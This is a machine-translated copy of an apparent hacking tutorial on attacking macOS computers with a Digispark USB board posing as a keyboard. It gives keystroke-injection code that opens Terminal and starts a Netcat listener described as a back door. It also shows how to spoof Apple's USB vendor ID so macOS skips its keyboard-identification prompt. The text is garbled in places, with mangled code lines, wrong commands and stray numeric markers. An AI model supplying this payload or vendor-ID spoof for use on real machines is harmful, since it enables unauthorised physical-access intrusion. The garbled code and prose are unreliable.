قالب وردپرس درنا توس
Home / Tips and Tricks / How to hack MacOS with Digispark Ducky Script Payloads «Null Byte :: WonderHowTo

How to hack MacOS with Digispark Ducky Script Payloads «Null Byte :: WonderHowTo



The USB Rubber Ducky and the Digispark board both have the same problem when attacking macOS computers: a pop-up with keyboard profiles that tries to identify non-Apple USB keyboards. Although it is a nasty disappointment, the solution is a simple adaptation that can target Mac computers, affecting the ability to target Windows and Linux devices.

Apple's profiler, the keyboard configuration assistant, is the window that opens when a non-Apple keyboard connects to a MacBook, Mac Pro, iMac, etc., which attempts to identify the newly connected keyboard. This secret security feature that all macOS devices have in the background protects against harmful payloads from devices such as a $ 50 USB Rubber Ducky or Digispark. But it is easily bypassed by making the Mac think that your attack device is an Apple device.

On Amazon: 5 Digispark ATtiny85 Micro USB development boards for Arduino for $ 10.99

MacOS versus HID attacks

battle between Macs and HID attacks (human interface device), we have macOS on one side with the Keyboard Setup Assistant profiler; the Digispark and USB Rubber Ducky are on the other hand with a macOS payload for a Rickroll user.

When we insert a HID tool into the macOS computer, we are greeted by our nemesis, the keyboard profiler, before the payload is a chance to execute.

You can think of the Keyboard Setup Assistant such as Clippy. It should help, but actually makes it harder. Trying to navigate the tool is also awful because it does not always profile the keyboard correctly. For example, you can sometimes press keys again to profile the keyboard, which does not work with a device that cannot respond to feedback. Instead, it is better to go around it than to deal with it.

Banishing the Keyboard Profiler

To get rid of the Keyboard Setup Assistant profiler, we have to determine what it is complaining about. Deep in the Digispark library configuration files, the cause of our problem is the configuration option below.

  / * ---------------------- ---- Device description ----------------- ---------- * /

#define USB_CFG_VENDOR_ID 0xc0.0x16
/ * USB seller ID for the device, first byte. If you have registered your
* own supplier ID, define it here. Otherwise you can use one of obdev & # 39; s for free
* shared VID / PID pairs. Read USB-ID & # 39; s-for-free.txt for rules!
* *** IMPORTANT NOTE ***
* This template uses obdev's shared VID / PID pair for Vendor Class devices
* with libusb: 0x16c0 / 0x5dc. Use this VID / PID pair ONLY if you understand
* the implications!
* / 

The problem here is that the vendor ID of "0xc0.0x16" is not Apple. That is why Apple does not trust it and takes the Keyboard Setup Assistant to identify the intruder. To solve the problem, we can go to the Digispark library configuration options and change the vendor ID to the value of an Apple device. It still works fine with non-Apple devices, and the Keyboard Setup Assistant is never run because macOS assumes it is recognized as a fellow Apple product.

What you need

a Digispark board. They can be purchased online for $ 2 to $ 4 each on Amazon or Walmart. The prices of AliExpress are even lower. At the time of writing, Digistump, the official Digispark store, is sold out and will not be ready until the beginning of 2020.

Connecting to the Digispark can be a little different depending on the operating system you use. For more information and troubleshooting you can consult the DigiSpark Wiki documentation.

Step 1: Installing and configuring Arduino IDE for the Digispark

Assuming you have installed Arduino IDE, the next step is to add support for the Digispark board. I have covered this process in detail in the previous manual for executing USB Rubber Ducky scripts on a Digispark, so complete step 1 before proceeding to step 2.

Step 2: create and modify a payload for MacOS

[19659005] To start with, we work with the standard " RickRoll_Update" load delivered on GitHub from CedArtic. In the first few actions of the load, it is designed to use the KEY_R and MOD_GUI_LEFT keys together to start a search window, but this does not work on macOS because the shortcut keys are different.

  // This DigiSpark script opens Rick Astley & # 39; s - I'm never going to give you up and also a
// fake Windows update screen and then maximize it with F11
# include "DigiKeyboard.h"
void setup () {
//empty
}
void loop () {
DigiKeyboard.delay (2000);
DigiKeyboard.sendKeyStroke (0);
DigiKeyboard.sendKeyStroke (KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay (600);
DigiKeyboard.print ("https://youtu.be/dQw4w9WgXcQ?t=43s");
DigiKeyboard.sendKeyStroke (KEY_ENTER);
DigiKeyboard.delay (5000);
DigiKeyboard.sendKeyStroke (KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay (3000);
DigiKeyboard.print ("http://fakeupdate.net/win10u/index.html");
DigiKeyboard.sendKeyStroke (KEY_ENTER);
DigiKeyboard.delay (2000);
DigiKeyboard.sendKeyStroke (KEY_F11);
for (;;) {/ * empty * /}
} 

To change this, we need to adjust it to use the keyboard shortcuts – the Space bar and the Command key – KEY_SPACE and MOD_GUI_LEFT respectively. Let's also change the payload so that Terminal is opened, a Netcat back door is activated, Spotlight Search is then opened again and the Rickroll happens. By opening a Netcat back door on top of Rickrolling, we can send waste through the network.

  #including "DigiKeyboard.h"
void setup () {
//empty
}
void loop () {
DigiKeyboard.delay (2000);
DigiKeyboard.sendKeyStroke (0);
DigiKeyboard.sendKeyStroke (KEY_SPACE, MOD_GUI_LEFT);
DigiKeyboard.delay (600);
DigiKeyboard.print ("terminal");
DigiKeyboard.sendKeyStroke (KEY_ENTER);
DigiKeyboard.delay (5000);
DigiKeyboard.print ("nc -l 9999");
DigiKeyboard.delay (1000);
DigiKeyboard.sendKeyStroke (KEY_ENTER);
DigiKeyboard.delay (600);
DigiKeyboard.sendKeyStroke (KEY_SPACE, MOD_GUI_LEFT);
DigiKeyboard.delay (600);
DigiKeyboard.print ("https://youtu.be/dQw4w9WgXcQ?t=43s");
DigiKeyboard.sendKeyStroke (KEY_ENTER);
DigiKeyboard.delay (5000);

for (;;) {/ * empty * /}
} 

Perfect. The ".sendKeyStroke (KEY_SPACE, MOD_GUI_LEFT);" on line 8, the Spotlight search bar calls up. Line ".print (" terminal ") of line 10;" looks for Terminal, while ".sendKeyStroke (KEY_ENTER);" opens it. Line ".print (" nc -1 9999 ");" type the Netcat command and Enter is hit again so that we can do whatever we want on the Mac. Spotlight Search is then reopened and the YouTube video is searched for.

You could stop here because the video is played directly in Spotlight Search, but if you open Enter it will open in a browser for a larger image. Elegant.

Pro Tip: find the key names for Digispark

If you need the Digispark to hit different keys on the keyboard, use the following commands to open the "Digikeyboard.h" file, which contains all the keys you have can use such as KEY_ENTER, KEY_ARROW_LEFT, MOD_CONTROL_LEFT, etc.

On macOS:

  ~ $ nano ~ / Library / Arduino15 / packages / digistump / hardware / avr / 1.6.7 / libraries / DigisparkKeyboard / Digikeyboard .h [19659012] On Linux: 

  ~ $ nano ~ / .arduino15 / packages / digistump / hardware / avr / 1.6.7 / libraries / DigisparkKeyboard / Digikeyboard.h 

Step 3: Change the usbconfig.h file [19659005] Now we have to change the configuration file before we push the code. Open a terminal window and use Nano to change the following file:

On macOS:

  ~ $ nano ~ / Library / Arduino15 / packages / digistump / hardware / avr / 1.6.7 / libraries / DigisparkKeyboard / usbconfig.h 

On Linux:

  ~ $ nano ~ / .arduino15 / packages / digistump / hardware / avr / 1.6.7 / libraries / DigisparkKeyboard / usbconfig.h 

Navigate to the part of the file that contains the USB seller ID and search for the following line:

  #define USB_CFG_VENDOR_ID 0xc0, 0x16 

Now change the values ​​to match the example below, which is an ID for an Apple device, and save the file.

  #define USB_CFG_VENDOR_ID 0xac, 0x05 

The section should now look like this:

  / * ------------------------- - Description of the device --------------------------- * /

#define USB_CFG_VENDOR_ID 0xac, 0x05
/ * USB seller ID for the device, first byte. If you have registered your
* own supplier ID, define it here. Otherwise you can use one of obdev & # 39; s for free
* shared VID / PID pairs. Read USB-ID & # 39; s-for-free.txt for rules!
* *** IMPORTANT NOTE ***
* This template uses obdev's shared VID / PID pair for Vendor Class devices
* with libusb: 0x16c0 / 0x5dc. Use this VID / PID pair ONLY if you understand
* the implications! 

Once this is done, every code that we push to the Digispark must indicate that it identifies itself as an Apple device.

Step 4: Push the Payload & Test It

Finally, we have to push the code to the Digispark to make it work. To do this, click on the right arrow in the upper left corner of the script window in Arduino IDE and the code is compiled. In the window below, Arduino instructs you to connect the Digispark within 60 seconds.

If you see output as below, you have done it! If this is not the case, try disconnecting and retrying the upload. You may also need to slightly adjust the Digispark in the USB connection to make contact, depending on the type of port that your computer uses.

To view the full effects of the load capacity, you can watch the video above. We have forwarded a binary file over the network, which caused a lot of noise and alarming text on the screen, but you can do whatever you want.

It is easy to make MacOS Payloads for the Digispark

Although macOS appears to have a security advantage compared to computers that are easily prey to HID attacks, the advantage is negligible at best. With our simple customization, any computer can be targeted and macOS is just as vulnerable as it thinks it is communicating with another Apple device.

Make sure you close your laptop if you leave it unattended, although I wouldn't worry about accidentally connecting a Digispark. Unlike the USB Rubber Ducky, which is designed to act as a USB flash drive, the Digispark looks suspicious and alarming, making it often a better tool to develop payloads instead of actually delivering them.

I hope you liked this manual to set up the cheap Digispark to attack macOS devices! If you have any questions about this tutorial on configuring the Digispark, please leave a comment and feel free to reach me on Twitter @KodyKinzie .

Don't miss it: Change the Ducky USB rubber with modified firmware

Save BIG this holiday weekend with our favorite Black Friday deals for smartphones, headphones, chargers, accessories, TVs and more.

Cover photo and screenshots by Kody / Null Byte




Source link